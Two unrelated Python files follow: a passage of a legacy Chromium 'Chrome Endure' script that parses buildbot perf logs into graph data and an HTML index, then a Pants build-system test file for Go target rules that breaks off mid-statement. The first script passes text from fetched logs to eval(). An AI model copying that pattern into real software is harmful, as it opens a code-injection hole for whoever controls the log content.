webapp_name: The string name of the webapp associated with the given test.
test_name: The string name of the test.
dest_dir: The name of the destination directory that needs to be set up.
"""
if not os.path.exists(dest_dir):
os.mkdir(dest_dir) # Test name directory.
os.chmod(dest_dir, 0755)
# Create config file.
config_file = os.path.join(dest_dir, 'config.js')
if not os.path.exists(config_file):
with open(config_file, 'w') as f:
f.write('var Config = {\n')
f.write('buildslave: "Chrome Endure Bots",\n')
f.write('title: "Chrome Endure %s Test: %s",\n' % (webapp_name.upper(),
test_name))
f.write('};\n')
os.chmod(config_file, 0755)
# Set up symbolic links to the real graphing files.
link_file = os.path.join(dest_dir, 'index.html')
if not os.path.exists(link_file):
os.symlink('../../endure_plotter.html', link_file)
link_file = os.path.join(dest_dir, 'endure_plotter.js')
if not os.path.exists(link_file):
os.symlink('../../endure_plotter.js', link_file)
link_file = os.path.join(dest_dir, 'js')
if not os.path.exists(link_file):
os.symlink('../../js', link_file)
def WriteToDataFile(new_line, existing_lines, revision, data_file):
"""Writes a new entry to an existing perf data file to be graphed.
If there's an existing line with the same revision number, overwrite its data
with the new line. Else, prepend the info for the new revision.
Args:
new_line: A dictionary representing perf information for the new entry.
existing_lines: A list of string lines from the existing perf data file.
revision: The string revision number associated with the new perf entry.
data_file: The string name of the perf data file to which to write.
"""
overwritten = False
for i, line in enumerate(existing_lines):
line_dict = simplejson.loads(line)
if line_dict['rev'] == revision:
existing_lines[i] = simplejson.dumps(new_line)
overwritten = True
break
elif int(line_dict['rev']) < int(revision):
break
if not overwritten:
existing_lines.insert(0, simplejson.dumps(new_line))
with open(data_file, 'w') as f:
f.write('\n'.join(existing_lines))
os.chmod(data_file, 0755)
def OutputPerfData(revision, graph_name, values, units, units_x, dest_dir,
is_stacked=False, stack_order=[]):
"""Outputs perf data to a local text file to be graphed.
Args:
revision: The string revision number associated with the perf data.
graph_name: The string name of the graph on which to plot the data.
values: A dict which maps a description to a value. A value is either a
single data value to be graphed, or a list of 2-tuples
representing (x, y) points to be graphed for long-running tests.
units: The string description for the y-axis units on the graph.
units_x: The string description for the x-axis units on the graph. Should
be set to None if the results are not for long-running graphs.
dest_dir: The name of the destination directory to which to write.
is_stacked: True to draw a "stacked" graph. First-come values are
stacked at bottom by default.
stack_order: A list that contains key strings in the order to stack values
in the graph.
"""
# Update graphs.dat, which contains metadata associated with each graph.
existing_graphs = []
graphs_file = os.path.join(dest_dir, 'graphs.dat')
if os.path.exists(graphs_file):
with open(graphs_file, 'r') as f:
existing_graphs = simplejson.loads(f.read())
is_new_graph = True
for graph in existing_graphs:
if graph['name'] == graph_name:
is_new_graph = False
break
if is_new_graph:
new_graph = {
'name': graph_name,
'units': units,
'important': False,
}
if units_x:
new_graph['units_x'] = units_x
existing_graphs.append(new_graph)
existing_graphs = sorted(existing_graphs, key=lambda x: x['name'])
with open(graphs_file, 'w') as f:
f.write(simplejson.dumps(existing_graphs, indent=2))
os.chmod(graphs_file, 0755)
# Update summary data file, containing the actual data to be graphed.
data_file_name = graph_name + '-summary.dat'
existing_lines = []
data_file = os.path.join(dest_dir, data_file_name)
if os.path.exists(data_file):
with open(data_file, 'r') as f:
existing_lines = f.readlines()
existing_lines = map(lambda x: x.strip(), existing_lines)
new_traces = {}
for description in values:
value = values[description]
if units_x:
points = []
for point in value:
points.append([str(point[0]), str(point[1])])
new_traces[description] = points
else:
new_traces[description] = [str(value), str(0.0)]
new_line = {
'traces': new_traces,
'rev': revision
}
if is_stacked:
new_line['stack'] = True
new_line['stack_order'] = stack_order
WriteToDataFile(new_line, existing_lines, revision, data_file)
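# For reference, each line in <graph_name>-summary.dat is a JSON object of the
# form built above, e.g. (values are illustrative):
#   {"traces": {"browser_vm": ["123.4", "0.0"]}, "rev": "190000"}
# Long-running results store a list of [x, y] string pairs per trace, and
# stacked graphs additionally carry "stack" and "stack_order" keys.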
def OutputEventData(revision, event_dict, dest_dir):
"""Outputs event data to a local text file to be graphed.
Args:
revision: The string revision number associated with the event data.
event_dict: A dict which maps a description to an array of tuples
representing event data to be graphed.
dest_dir: The name of the destination directory to which to write.
"""
data_file_name = '_EVENT_-summary.dat'
existing_lines = []
data_file = os.path.join(dest_dir, data_file_name)
if os.path.exists(data_file):
with open(data_file, 'r') as f:
existing_lines = f.readlines()
existing_lines = map(lambda x: x.strip(), existing_lines)
new_events = {}
for description in event_dict:
event_list = event_dict[description]
value_list = []
for event_time, event_data in event_list:
value_list.append([str(event_time), event_data])
new_events[description] = value_list
new_line = {
'rev': revision,
'events': new_events
}
WriteToDataFile(new_line, existing_lines, revision, data_file)
def UpdatePerfDataFromFetchedContent(
revision, content, webapp_name, test_name, graph_dir, only_dmp=False):
"""Update perf data from fetched stdio data.
Args:
revision: The string revision number associated with the new perf entry.
content: Fetched stdio data.
webapp_name: A name of the webapp.
test_name: A name of the test.
graph_dir: A path to the graph directory.
only_dmp: True if only Deep Memory Profiler results should be used.
"""
perf_data_raw = []
def AppendRawPerfData(graph_name, description, value, units, units_x,
webapp_name, test_name, is_stacked=False):
perf_data_raw.append({
'graph_name': graph_name,
'description': description,
'value': value,
'units': units,
'units_x': units_x,
'webapp_name': webapp_name,
'test_name': test_name,
'stack': is_stacked,
})
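# The scans below expect Chrome perf-log style RESULT lines; the examples
# here are illustrative only:
#   RESULT vm_size: browser= 123456.0 kb                       (short-running)
#   RESULT vm_size: browser= [(0, 100.0), (60, 105.5)] kb sec  (long-running)
#   RESULT _EVENT_: GarbageCollect= [(30, {})]                 (event)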
# First scan for short-running perf test results.
for match in re.findall(
r'RESULT ([^:]+): ([^=]+)= ([-\d\.]+) (\S+)', content):
if (not only_dmp) or match[0].endswith('-DMP'):
try:
match2 = eval(match[2])
except SyntaxError:
match2 = None
if match2:
AppendRawPerfData(match[0], match[1], match2, match[3], None,
webapp_name, webapp_name)
# Next scan for long-running perf test results.
for match in re.findall(
r'RESULT ([^:]+): ([^=]+)= (\[[^\]]+\]) (\S+) (\S+)', content):
if (not only_dmp) or match[0].endswith('-DMP'):
try:
match2 = eval(match[2])
except SyntaxError:
match2 = None
# TODO(dmikurube): Change the condition to use stacked graph when we
# determine how to specify it.
if match2:
AppendRawPerfData(match[0], match[1], match2, match[3], match[4],
webapp_name, test_name, match[0].endswith('-DMP'))
# Next scan for events in the test results.
for match in re.findall(
r'RESULT _EVENT_: ([^=]+)= (\[[^\]]+\])', content):
try:
match1 = eval(match[1])
except SyntaxError:
match1 = None
if match1:
AppendRawPerfData('_EVENT_', match[0], match1, None, None,
webapp_name, test_name)
# For each graph_name/description pair that refers to a long-running test
# result or an event, concatenate all the results together (assume results
# in the input file are in the correct order). For short-running test
# results, keep just one if more than one is specified.
perf_data = {} # Maps a graph-line key to a perf data dictionary.
for data in perf_data_raw:
key_graph = data['graph_name']
key_description = data['description']
if not key_graph in perf_data:
perf_data[key_graph] = {
'graph_name': data['graph_name'],
'value': {},
'units': data['units'],
'units_x': data['units_x'],
'webapp_name': data['webapp_name'],
'test_name': data['test_name'],
}
perf_data[key_graph]['stack'] = data['stack']
if 'stack_order' not in perf_data[key_graph]:
perf_data[key_graph]['stack_order'] = []
if (data['stack'] and
data['description'] not in perf_data[key_graph]['stack_order']):
perf_data[key_graph]['stack_order'].append(data['description'])
if data['graph_name'] != '_EVENT_' and not data['units_x']:
# Short-running test result.
perf_data[key_graph]['value'][key_description] = data['value']
else:
# Long-running test result or event.
if key_description in perf_data[key_graph]['value']:
perf_data[key_graph]['value'][key_description] += data['value']
else:
perf_data[key_graph]['value'][key_description] = data['value']
# Finally, for each graph-line in |perf_data|, update the associated local
# graph data files if necessary.
for perf_data_key in perf_data:
perf_data_dict = perf_data[perf_data_key]
dest_dir = os.path.join(graph_dir, perf_data_dict['webapp_name'])
if not os.path.exists(dest_dir):
os.mkdir(dest_dir) # Webapp name directory.
os.chmod(dest_dir, 0755)
dest_dir = os.path.join(dest_dir, perf_data_dict['test_name'])
SetupBaseGraphDirIfNeeded(perf_data_dict['webapp_name'],
perf_data_dict['test_name'], dest_dir)
if perf_data_dict['graph_name'] == '_EVENT_':
OutputEventData(revision, perf_data_dict['value'], dest_dir)
else:
OutputPerfData(revision, perf_data_dict['graph_name'],
perf_data_dict['value'],
perf_data_dict['units'], perf_data_dict['units_x'],
dest_dir,
perf_data_dict['stack'], perf_data_dict['stack_order'])
def SlaveLocation(master_location, slave_info):
"""Returns slave location for |master_location| and |slave_info|."""
if master_location.startswith('http://'):
return master_location + urllib.quote(slave_info['slave_name'])
else:
return os.path.join(master_location,
slave_info['slave_name'].translate(MANGLE_TRANSLATION))
def GetRevisionAndLogs(slave_location, build_num):
"""Get a revision number and log locations.
Args:
slave_location: A URL or a path to the build slave data.
build_num: A build number.
Returns:
A pair of the revision number and a list of strings that contain locations
of logs. (False, []) in case of error.
"""
if slave_location.startswith('http://'):
location = slave_location + '/builds/' + str(build_num)
else:
location = os.path.join(slave_location, str(build_num))
revision = False
logs = []
fp = None
try:
if location.startswith('http://'):
fp = urllib2.urlopen(location)
contents = fp.read()
revisions = re.findall(r'<td class="left">got_revision</td>\s+'
'<td>(\d+)</td>\s+<td>Source</td>', contents)
if revisions:
revision = revisions[0]
logs = [location + link + '/text' for link
in re.findall(r'(/steps/endure[^/]+/logs/stdio)', contents)]
else:
fp = open(location, 'rb')
build = cPickle.load(fp)
properties = build.getProperties()
if properties.has_key('got_revision'):
revision = build.getProperty('got_revision')
candidates = os.listdir(slave_location)
logs = [os.path.join(slave_location, filename)
for filename in candidates
if re.match(r'%d-log-endure[^/]+-stdio' % build_num, filename)]
except urllib2.URLError, e:
logging.exception('Error reading build URL "%s": %s', location, str(e))
return False, []
except (IOError, OSError), e:
logging.exception('Error reading build file "%s": %s', location, str(e))
return False, []
finally:
if fp:
fp.close()
return revision, logs
def ExtractTestNames(log_location, is_dbg):
"""Extract test names from |log_location|.
Returns:
A dict of a log location, webapp's name and test's name. False if error.
"""
if log_location.startswith('http://'):
location = urllib.unquote(log_location)
test_pattern = r'endure_([^_]+)(_test |-)([^/]+)/'
wpr_test_pattern = r'endure_([^_]+)_wpr(_test |-)([^/]+)/'
else:
location = log_location
test_pattern = r'endure_([^_]+)(_test_|-)([^/]+)-stdio'
wpr_test_pattern = 'endure_([^_]+)_wpr(_test_|-)([^/]+)-stdio'
found_wpr_result = False
match = re.findall(test_pattern, location)
if not match:
match = re.findall(wpr_test_pattern, location)
if match:
found_wpr_result = True
else:
logging.error('Test name not in expected format: ' + location)
return False
match = match[0]
webapp_name = match[0] + '_wpr' if found_wpr_result else match[0]
webapp_name = webapp_name + '_dbg' if is_dbg else webapp_name
test_name = match[2]
return {
'location': log_location,
'webapp_name': webapp_name,
'test_name': test_name,
}
def GetStdioContents(stdio_location):
"""Gets appropriate stdio contents.
Returns:
A content string of the stdio log. None in case of error.
"""
fp = None
contents = ''
try:
if stdio_location.startswith('http://'):
fp = urllib2.urlopen(stdio_location, timeout=60)
# Since in-progress test output is sent chunked, there's no EOF. We need
# to specially handle this case so we don't hang here waiting for the
# test to complete.
start_time = time.time()
while True:
data = fp.read(1024)
if not data:
break
contents += data
if time.time() - start_time >= 30: # Read for at most 30 seconds.
break
else:
fp = open(stdio_location)
data = fp.read()
contents = ''
index = 0
# Buildbot log files are stored in the netstring format.
# http://en.wikipedia.org/wiki/Netstring
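# As parsed below, each record looks like "<length>:<channel><text>,", where
# <length> counts the channel digit plus the text and <channel> is a single
# digit (0 = stdout, the only channel kept here). For example, "7:0hello\n,"
# contributes the stdout text "hello\n".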
while index < len(data):
index2 = index
while data[index2].isdigit():
index2 += 1
if data[index2] != ':':
logging.error('Log file is not in expected format: %s' %
stdio_location)
contents = None
break
length = int(data[index:index2])
index = index2 + 1
channel = int(data[index])
index += 1
if data[index+length-1] != ',':
logging.error('Log file is not in expected format: %s' %
stdio_location)
contents = None
break
if channel == 0:
contents += data[index:(index+length-1)]
index += length
except (urllib2.URLError, socket.error, IOError, OSError), e:
# Issue warning but continue to the next stdio link.
logging.warning('Error reading test stdio data "%s": %s',
stdio_location, str(e))
finally:
if fp:
fp.close()
return contents
def UpdatePerfDataForSlaveAndBuild(
slave_info, build_num, graph_dir, master_location):
"""Process updated perf data for a particular slave and build number.
Args:
slave_info: A dictionary containing information about the slave to process.
build_num: The particular build number on the slave to process.
graph_dir: A path to the graph directory.
master_location: A URL or a path to the build master data.
Returns:
True if the perf data for the given slave/build is updated properly, or
False if any critical error occurred.
"""
if not master_location.startswith('http://'):
# Source is a file.
from buildbot.status import builder
slave_location = SlaveLocation(master_location, slave_info)
logging.debug(' %s, build %d.', slave_info['slave_name'], build_num)
is_dbg = '(dbg)' in slave_info['slave_name']
revision, logs = GetRevisionAndLogs(slave_location, build_num)
if not revision:
return False
stdios = []
for log_location in logs:
stdio = ExtractTestNames(log_location, is_dbg)
if not stdio:
return False
stdios.append(stdio)
for stdio in stdios:
stdio_location = stdio['location']
contents = GetStdioContents(stdio_location)
if contents:
UpdatePerfDataFromFetchedContent(revision, contents,
stdio['webapp_name'],
stdio['test_name'],
graph_dir, is_dbg)
return True
def GetMostRecentBuildNum(master_location, slave_name):
"""Gets the most recent buld number for |slave_name| in |master_location|."""
most_recent_build_num = None
if master_location.startswith('http://'):
slave_url = master_location + urllib.quote(slave_name)
url_contents = ''
fp = None
try:
fp = urllib2.urlopen(slave_url, timeout=60)
url_contents = fp.read()
except urllib2.URLError, e:
logging.exception('Error reading builder URL: %s', str(e))
return None
finally:
if fp:
fp.close()
matches = re.findall(r'/(\d+)/stop', url_contents)
if matches:
most_recent_build_num = int(matches[0])
else:
matches = re.findall(r'#(\d+)</a></td>', url_contents)
if matches:
most_recent_build_num = sorted(map(int, matches), reverse=True)[0]
else:
slave_path = os.path.join(master_location,
slave_name.translate(MANGLE_TRANSLATION))
files = os.listdir(slave_path)
number_files = [int(filename) for filename in files if filename.isdigit()]
if number_files:
most_recent_build_num = sorted(number_files, reverse=True)[0]
if most_recent_build_num:
logging.debug('%s most recent build number: %s',
slave_name, most_recent_build_num)
else:
logging.error('Could not identify latest build number for slave %s.',
slave_name)
return most_recent_build_num
def UpdatePerfDataFiles(graph_dir, master_location):
"""Updates the Chrome Endure graph data files with the latest test results.
For each known Chrome Endure slave, we scan its latest test results looking
for any new test data. Any new data that is found is then appended to the
data files used to display the Chrome Endure graphs.
Args:
graph_dir: A path to the graph directory.
master_location: A URL or a path to the build master data.
Returns:
True if all graph data files are updated properly, or
False if any error occurred.
"""
slave_list = []
for slave_name in CHROME_ENDURE_SLAVE_NAMES:
slave_info = {}
slave_info['slave_name'] = slave_name
slave_info['most_recent_build_num'] = None
slave_info['last_processed_build_num'] = None
slave_list.append(slave_info)
# Identify the most recent build number for each slave.
logging.debug('Searching for latest build numbers for each slave...')
for slave in slave_list:
slave_name = slave['slave_name']
slave['most_recent_build_num'] = GetMostRecentBuildNum(
master_location, slave_name)
# Identify the last-processed build number for each slave.
logging.debug('Identifying last processed build numbers...')
if not os.path.exists(LAST_BUILD_NUM_PROCESSED_FILE):
for slave_info in slave_list:
slave_info['last_processed_build_num'] = 0
else:
with open(LAST_BUILD_NUM_PROCESSED_FILE, 'r') as fp:
file_contents = fp.read()
for match in re.findall(r'([^:]+):(\d+)', file_contents):
slave_name = match[0].strip()
last_processed_build_num = match[1].strip()
for slave_info in slave_list:
if slave_info['slave_name'] == slave_name:
slave_info['last_processed_build_num'] = int(
last_processed_build_num)
for slave_info in slave_list:
if not slave_info['last_processed_build_num']:
slave_info['last_processed_build_num'] = 0
logging.debug('Done identifying last processed build numbers.')
# For each Chrome Endure slave, process each build in-between the last
# processed build num and the most recent build num, inclusive. To process
# each one, first get the revision number for that build, then scan the test
# result stdio for any performance data, and add any new performance data to
# local files to be graphed.
for slave_info in slave_list:
logging.debug('Processing %s, builds %d-%d...',
slave_info['slave_name'],
slave_info['last_processed_build_num'],
slave_info['most_recent_build_num'])
curr_build_num = slave_info['last_processed_build_num']
while curr_build_num <= slave_info['most_recent_build_num']:
if not UpdatePerfDataForSlaveAndBuild(slave_info, curr_build_num,
graph_dir, master_location):
# Do not give up. The first files might be removed by buildbot.
logging.warning('Logs do not exist in buildbot for #%d of %s.' %
(curr_build_num, slave_info['slave_name']))
curr_build_num += 1
# Log the newly-processed build numbers.
logging.debug('Logging the newly-processed build numbers...')
with open(LAST_BUILD_NUM_PROCESSED_FILE, 'w') as f:
for slave_info in slave_list:
f.write('%s:%s\n' % (slave_info['slave_name'],
slave_info['most_recent_build_num']))
return True
def GenerateIndexPage(graph_dir):
"""Generates a summary (landing) page for the Chrome Endure graphs.
Args:
graph_dir: A path to the graph directory.
"""
logging.debug('Generating new index.html page...')
# Page header.
page = """
<html>
<head>
<title>Chrome Endure Overview</title>
<script language="javascript">
function DisplayGraph(name, graph) {
document.write(
'<td><iframe scrolling="no" height="438" width="700" src="');
document.write(name);
document.write('"></iframe></td>');
}
</script>
</head>
<body>
<center>
<h1>
Chrome Endure
</h1>
"""
# Print current time.
page += '<p>Updated: %s</p>\n' % (
time.strftime('%A, %B %d, %Y at %I:%M:%S %p %Z'))
# Links for each webapp.
webapp_names = [x for x in os.listdir(graph_dir) if
x not in ['js', 'old_data', '.svn', '.git'] and
os.path.isdir(os.path.join(graph_dir, x))]
webapp_names = sorted(webapp_names)
page += '<p> ['
for i, name in enumerate(webapp_names):
page += '<a href="#%s">%s</a>' % (name.upper(), name.upper())
if i < len(webapp_names) - 1:
page += ' | '
page += '] </p>\n'
# Print out the data for each webapp.
for webapp_name in webapp_names:
page += '\n<h1 id="%s">%s</h1>\n' % (webapp_name.upper(),
webapp_name.upper())
# Links for each test for this webapp.
test_names = [x for x in
os.listdir(os.path.join(graph_dir, webapp_name))]
test_names = sorted(test_names)
page += '<p> ['
for i, name in enumerate(test_names):
page += '<a href="#%s">%s</a>' % (name, name)
if i < len(test_names) - 1:
page += ' | '
page += '] </p>\n'
# Print out the data for each test for this webapp.
for test_name in test_names:
# Get the set of graph names for this test.
graph_names = [x[:x.find('-summary.dat')] for x in
os.listdir(os.path.join(graph_dir,
webapp_name, test_name))
if '-summary.dat' in x and '_EVENT_' not in x]
graph_names = sorted(graph_names)
page += '<h2 id="%s">%s</h2>\n' % (test_name, test_name)
page += '<table>\n'
for i, graph_name in enumerate(graph_names):
if i % 2 == 0:
page += ' <tr>\n'
page += (' <script>DisplayGraph("%s/%s?graph=%s&lookout=1");'
'</script>\n' % (webapp_name, test_name, graph_name))
if i % 2 == 1:
page += ' </tr>\n'
if len(graph_names) % 2 == 1:
page += ' </tr>\n'
page += '</table>\n'
# Page footer.
page += """
</center>
</body>
</html>
"""
index_file = os.path.join(graph_dir, 'index.html')
with open(index_file, 'w') as f:
f.write(page)
os.chmod(index_file, 0755)
def main():
parser = optparse.OptionParser()
parser.add_option(
'-v', '--verbose', action='store_true', default=False,
help='Use verbose logging.')
parser.add_option(
'-s', '--stdin', action='store_true', default=False,
help='Input from stdin instead of slaves for testing this script.')
parser.add_option(
'-b', '--buildbot', dest='buildbot', metavar="BUILDBOT",
default=BUILDER_URL_BASE,
help='Use log files in a buildbot at BUILDBOT. BUILDBOT can be a '
'buildbot\'s builder URL or a local path to a buildbot directory. '
'Both an absolute path and a relative path are available, e.g. '
'"/home/chrome-bot/buildbot" or "../buildbot". '
'[default: %default]')
parser.add_option(
'-g', '--graph', dest='graph_dir', metavar="DIR", default=LOCAL_GRAPH_DIR,
help='Output graph data files to DIR. [default: %default]')
options, _ = parser.parse_args(sys.argv)
logging_level = logging.DEBUG if options.verbose else logging.INFO
logging.basicConfig(level=logging_level,
format='[%(asctime)s] %(levelname)s: %(message)s')
if options.stdin:
content = sys.stdin.read()
UpdatePerfDataFromFetchedContent(
'12345', content, 'webapp', 'test', options.graph_dir)
else:
if options.buildbot.startswith('http://'):
master_location = options.buildbot
else:
build_dir = os.path.join(options.buildbot, 'build')
third_party_dir = os.path.join(build_dir, 'third_party')
sys.path.append(third_party_dir)
sys.path.append(os.path.join(third_party_dir, 'buildbot_8_4p1'))
sys.path.append(os.path.join(third_party_dir, 'twisted_10_2'))
master_location = os.path.join(build_dir, 'masters',
'master.chromium.endure')
success = UpdatePerfDataFiles(options.graph_dir, master_location)
if not success:
logging.error('Failed to update perf data files.')
sys.exit(0)
GenerateIndexPage(options.graph_dir)
logging.debug('All done!')
if __name__ == '__main__':
main()
|
|
# Copyright 2021 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
import os.path
from textwrap import dedent
import pytest
from pants.backend.go import target_type_rules
from pants.backend.go.target_type_rules import (
GenerateTargetsFromGoModRequest,
InferGoPackageDependenciesRequest,
InjectGoBinaryMainDependencyRequest,
)
from pants.backend.go.target_types import (
GoBinaryMainPackage,
GoBinaryMainPackageField,
GoBinaryMainPackageRequest,
GoBinaryTarget,
GoFirstPartyPackageSourcesField,
GoFirstPartyPackageSubpathField,
GoFirstPartyPackageTarget,
GoImportPathField,
GoModTarget,
GoThirdPartyModulePathField,
GoThirdPartyModuleVersionField,
GoThirdPartyPackageTarget,
)
from pants.backend.go.util_rules import first_party_pkg, go_mod, sdk, third_party_pkg
from pants.base.exceptions import ResolveError
from pants.build_graph.address import Address
from pants.core.target_types import GenericTarget
from pants.engine.addresses import Addresses
from pants.engine.rules import QueryRule
from pants.engine.target import (
Dependencies,
DependenciesRequest,
GeneratedTargets,
InferredDependencies,
InjectedDependencies,
InvalidFieldException,
InvalidTargetException,
)
from pants.testutil.rule_runner import RuleRunner, engine_error
from pants.util.ordered_set import FrozenOrderedSet
# -----------------------------------------------------------------------------------------------
# Dependency inference
# -----------------------------------------------------------------------------------------------
@pytest.fixture
def rule_runner() -> RuleRunner:
rule_runner = RuleRunner(
rules=[
*go_mod.rules(),
*first_party_pkg.rules(),
*third_party_pkg.rules(),
*sdk.rules(),
*target_type_rules.rules(),
QueryRule(Addresses, [DependenciesRequest]),
QueryRule(GoBinaryMainPackage, [GoBinaryMainPackageRequest]),
QueryRule(InjectedDependencies, [InjectGoBinaryMainDependencyRequest]),
],
target_types=[GoModTarget, GoBinaryTarget, GenericTarget],
)
rule_runner.set_options([], env_inherit={"PATH"})
return rule_runner
def test_go_package_dependency_inference(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"foo/BUILD": "go_mod()",
"foo/go.mod": dedent(
"""\
module go.example.com/foo
go 1.17
require github.com/google/go-cmp v0.4.0
"""
),
"foo/go.sum": dedent(
"""\
github.com/google/go-cmp v0.4.0 h1:xsAVV57WRhGj6kEIi8ReJzQlHHqcBYCElAvkovg3B/4=
github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543 h1:E7g+9GITq07hpfrRu66IVDexMakfv52eLZ2CXBWiKr4=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
"""
),
"foo/pkg/foo.go": dedent(
"""\
package pkg
import "github.com/google/go-cmp/cmp"
func grok(left, right string) bool {
return cmp.Equal(left, right)
}
"""
),
"foo/cmd/main.go": dedent(
"""\
package main
import (
"fmt"
"go.example.com/foo/pkg"
)
func main() {
fmt.Printf("%s\n", pkg.Grok())
}"""
),
}
)
tgt1 = rule_runner.get_target(Address("foo", generated_name="./cmd"))
inferred_deps1 = rule_runner.request(
InferredDependencies,
[InferGoPackageDependenciesRequest(tgt1[GoFirstPartyPackageSourcesField])],
)
assert inferred_deps1.dependencies == FrozenOrderedSet([Address("foo", generated_name="./pkg")])
tgt2 = rule_runner.get_target(Address("foo", generated_name="./pkg"))
inferred_deps2 = rule_runner.request(
InferredDependencies,
[InferGoPackageDependenciesRequest(tgt2[GoFirstPartyPackageSourcesField])],
)
assert inferred_deps2.dependencies == FrozenOrderedSet(
[Address("foo", generated_name="github.com/google/go-cmp/cmp")]
)
# -----------------------------------------------------------------------------------------------
# Generate package targets from `go_mod`
# -----------------------------------------------------------------------------------------------
def test_generate_package_targets(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"src/go/BUILD": "go_mod()\n",
"src/go/go.mod": dedent(
"""\
module example.com/src/go
go 1.17
require (
github.com/google/go-cmp v0.4.0
github.com/google/uuid v1.2.0
)
"""
),
"src/go/go.sum": dedent(
"""\
github.com/google/go-cmp v0.4.0 h1:xsAVV57WRhGj6kEIi8ReJzQlHHqcBYCElAvkovg3B/4=
github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
github.com/google/uuid v1.2.0 h1:qJYtXnJRWmpe7m/3XlyhrsLrEURqHRM2kxzoxXqyUDs=
github.com/google/uuid v1.2.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543 h1:E7g+9GITq07hpfrRu66IVDexMakfv52eLZ2CXBWiKr4=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
"""
),
"src/go/hello.go": "",
"src/go/subdir/f.go": "",
"src/go/subdir/f2.go": "",
"src/go/another_dir/subdir/f.go": "",
}
)
generator = rule_runner.get_target(Address("src/go"))
generated = rule_runner.request(GeneratedTargets, [GenerateTargetsFromGoModRequest(generator)])
def gen_first_party_tgt(rel_dir: str, sources: list[str]) -> GoFirstPartyPackageTarget:
return GoFirstPartyPackageTarget(
{
GoImportPathField.alias: (
os.path.join("example.com/src/go", rel_dir) if rel_dir else "example.com/src/go"
),
GoFirstPartyPackageSubpathField.alias: rel_dir,
GoFirstPartyPackageSourcesField.alias: tuple(sources),
},
Address("src/go", generated_name=f"./{rel_dir}"),
)
def gen_third_party_tgt(
mod_path: str, version: str, import_path: str
) -> GoThirdPartyPackageTarget:
return GoThirdPartyPackageTarget(
{
GoImportPathField.alias: import_path,
GoThirdPartyModulePathField.alias: mod_path,
GoThirdPartyModuleVersionField.alias: version,
},
Address("src/go", generated_name=import_path),
)
expected = GeneratedTargets(
generator,
{
gen_first_party_tgt("", ["hello.go"]),
gen_first_party_tgt("subdir", ["subdir/f.go", "subdir/f2.go"]),
gen_first_party_tgt("another_dir/subdir", ["another_dir/subdir/f.go"]),
gen_third_party_tgt("github.com/google/uuid", "v1.2.0", "github.com/google/uuid"),
gen_third_party_tgt(
"github.com/google/go-cmp", "v0.4.0", "github.com/google/go-cmp/cmp"
),
gen_third_party_tgt(
"github.com/google/go-cmp", "v0.4.0", "github.com/google/go-cmp/cmp/cmpopts"
),
gen_third_party_tgt(
"github.com/google/go-cmp", "v0.4.0", "github.com/google/go-cmp/cmp/internal/diff"
),
gen_third_party_tgt(
"github.com/google/go-cmp", "v0.4.0", "github.com/google/go-cmp/cmp/internal/flags"
),
gen_third_party_tgt(
"github.com/google/go-cmp",
"v0.4.0",
"github.com/google/go-cmp/cmp/internal/function",
),
gen_third_party_tgt(
"github.com/google/go-cmp",
"v0.4.0",
"github.com/google/go-cmp/cmp/internal/testprotos",
),
gen_third_party_tgt(
"github.com/google/go-cmp",
"v0.4.0",
"github.com/google/go-cmp/cmp/internal/teststructs",
),
gen_third_party_tgt(
"github.com/google/go-cmp", "v0.4.0", "github.com/google/go-cmp/cmp/internal/value"
),
gen_third_party_tgt(
"golang.org/x/xerrors", "v0.0.0-20191204190536-9bdfabe68543", "golang.org/x/xerrors"
),
gen_third_party_tgt(
"golang.org/x/xerrors",
"v0.0.0-20191204190536-9bdfabe68543",
"golang.org/x/xerrors/internal",
),
},
)
assert list(generated.keys()) == list(expected.keys())
for addr, tgt in generated.items():
assert tgt == expected[addr]
def test_package_targets_cannot_be_manually_created() -> None:
with pytest.raises(InvalidTargetException):
GoFirstPartyPackageTarget(
{GoImportPathField.alias: "foo", GoFirstPartyPackageSubpathField.alias: "foo"},
Address("foo"),
)
with pytest.raises(InvalidTargetException):
GoThirdPartyPackageTarget(
{
GoImportPathField.alias: "foo",
GoThirdPartyModulePathField.alias: "foo",
GoThirdPartyModuleVersionField.alias: "foo",
},
Address("foo"),
)
# -----------------------------------------------------------------------------------------------
# The `main` field for `go_binary`
# -----------------------------------------------------------------------------------------------
def test_determine_main_pkg_for_go_binary(rule_runner: RuleRunner) -> None:
rule_runner.write_files(
{
"go.mod": dedent(
"""\
module example.com/foo
go 1.17
"""
),
"BUILD": "go_mod(name='mod')",
"explicit/f.go": "",
"explicit/BUILD": "go_binary(main='//:mod#./explicit')",
"inferred/f.go": "",
"inferred/BUILD": "go_binary()",
"ambiguous/f.go": "",
"ambiguous/go.mod": dedent(
"""\
module example.com/ambiguous
go 1.17
"""
),
"ambiguous/BUILD": "go_binary()",
# Note there are no `.go` files in this dir, so no package targets will be created.
"missing/BUILD": "go_binary()",
"explicit_wrong_type/BUILD": dedent(
"""\
target(name='dep')
go_binary(main=':dep')
"""
),
}
)
def get_main(addr: Address) -> Address:
tgt = rule_runner.get_target(addr)
main_addr = rule_runner.request(
GoBinaryMainPackage, [GoBinaryMainPackageRequest(tgt[GoBinaryMainPackageField])]
).address
injected_addresses = rule_runner.request(
InjectedDependencies, [InjectGoBinaryMainDependencyRequest(tgt[Dependencies])]
)
assert [main_addr] == list(injected_addresses)
return main_addr
assert get_main(Address("explicit")) == Address(
"", target_name="mod", generated_name="./explicit"
)
assert get_main(Address("inferred")) == Address(
"", target_name="mod", generated_name="./inferred"
)
with engine_error(ResolveError, contains="none were found"):
get_main(Address("missing"))
with engine_error(ResolveError, contains="There are multiple `go_first_party_package` targets"):
get_main(Address("ambiguous"))
with engine_error(
